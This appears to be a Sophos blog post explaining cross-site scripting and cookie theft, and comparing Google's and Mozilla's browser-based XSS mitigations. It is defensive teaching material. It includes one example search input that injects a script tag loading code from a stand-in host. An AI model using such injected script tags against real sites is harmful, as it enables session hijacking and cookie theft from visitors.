The beginning of the end of popup porn, Facebook worms and cross-site phishing?

Visit just about any page on any website – including most of sophos.com – and your browser will suck in content from other sites, too. This third-party content is often sourced using script code, such as JavaScript, in the primary web page. A script which reaches out from one web site to another is called a cross-site script, or XSS.

Importantly, scripts in a web page can trigger page requests which include (encoded either as parameters to the HTTP request or in the HTTP request body) client-side information. This includes the values of any cookies currently set by the website you are visiting.

Cookies are needed because the HTTP protocol itself is stateless. You don’t log in to an HTTP server and then issue a series of commands, as you do when using FTP or SSH. Instead, each request stands alone, which greatly simplifies – at least in theory – the design and implementation of a basic web server.

Cookies, transmitted in the headers of HTTP requests and replies, are the stateful glue by which modern web servers tie together an otherwise-independent set of HTTP requests into a transaction, or a session, or even a series of sessions. Cookies are how Google, for instance, remembers your search settings, even between multiple sessions, or how Sophos knows that you have already logged in to the product download area in this visit.

Separately-visited web sites can’t access each other’s cookies via scripts (at least if the browser is correctly implemented), but scripts in a site sourced as part of another site are implicitly authorised to reach into that site’s data. So, if you can sneak an unauthorised script tag into someone else’s web page, you can grab the value of all cookies set for that website, possibly including current session authentication information. This may even allow you to hijack that session.

Websites which can be compromised through the insertion of malicious script tags are said to have a cross-site scripting (XSS) vulnerability. Carrying out such a compromise is an XSS exploit.

There are two main sorts of XSS exploit. First is the stored or persistent exploit. As the name suggests, unauthorised tags are permanently stored onto the victim’s web server – for example, using a SQL injection hack to infect fields in the server’s databases. Anyone visiting the site, even if they visit it directly, may be exposed to attack. (SophosLabs finds about 25,000 newly-infected web pages per day, so this sort of compromise is very common.)

More pernicious is the non-persistent or reflective exploit. This sort of exploit is usually much more difficult to detect and to remediate because the unauthorised tags never actually exist on the affected web server. This means that you cannnot search for them in files or databases. Reflective XSS attacks exploit poor input validation by the server, tricking the server into accepting malicious tags as input and then reflecting them blindly in the response sent back to the browser.

This sort of attack is possible because HTML relies on special characters to denote embedded objects such as scripts. If I write script in my web page, your browser will display script. But if I write <script>, your browser takes this as signal to run a script. If I want to display the text <script>, then I must carefully encode the less-than and greater-than signs, like this: &lt;script&gt; so that I don’t send you an unexpected script tag.

Now imagine that your website has a search form. If I type in banana, you may generate a web page to tell me the word banana was not found. But if I “search” for <script src=http://dodgy.example/xss.js></script>, you must convert those angle brackets into &lt; and &gt; in your search results page. If you blindly reflect my text, then I can execute a cross-site script against your website simply through a search. This is always incorrect, usually dangerous, and likely to be exploited.

Sadly, cleaning up, or sanitising, externally-submitted text so that it can be rendered safely back to the visitor is not an easy task, so many web servers are vulnerable to XSS exploits. These can be used for numerous malicious purposes, such as Twitter worms, phishing, unauthorised and unwanted popups, and more.

Unsurprisingly, then, both Mozilla and Google are currently working on browser-based mitigation of XSS exploits. Both approaches are interesting.

anti-xss

Google’s idea is that the browser should condemn any web page which contains script tags (or similar) which also appear in the HTTP request for that page. After all, if a web request contains text which happens to be an HTML tag, that tag ought to be sanitised in the reply. So tags which appear in both request and reply probably represent a reflective XSS risk, and possibly represent an actual XSS exploit. Therefore they should be blocked.

Mozilla’s approach is complementary, defining a set of HTTP headers by which webmasters can specify the maximum behaviour they expect from their pages. Browsers which understand these headers can then automatically block behaviour outside the specified limits. If you use cross-site scripts, but only to specific third-party locations, such as Google Analytics, you can inform the browser so that it can block XSS requests to unexpected sites.

Google’s technique deals only with reflective XSS exploits, but is automatic and does not rely on webmasters adding special HTTP headers. Mozilla’s technique is discretionary, and only works for sites which go the extra mile of accurately marking up their HTTP replies, but it does provide an additional vehicle for well-meaning webmasters to defend against both reflective and stored XSS attacks.

These approaches are unlikely to mean the end of popup porn, Facebook worms, cross-site phishing and the like, but they are to be applauded nevertheless. What is interesting, in the light of my recent article about cloud computing, is that both approaches require programmatic intelligence embedded into the browser itself, even though they protect against cloud-based vulnerabilities.

In other words, endpoint security really is here to stay. The endpoint is dead. Long live the endpoint.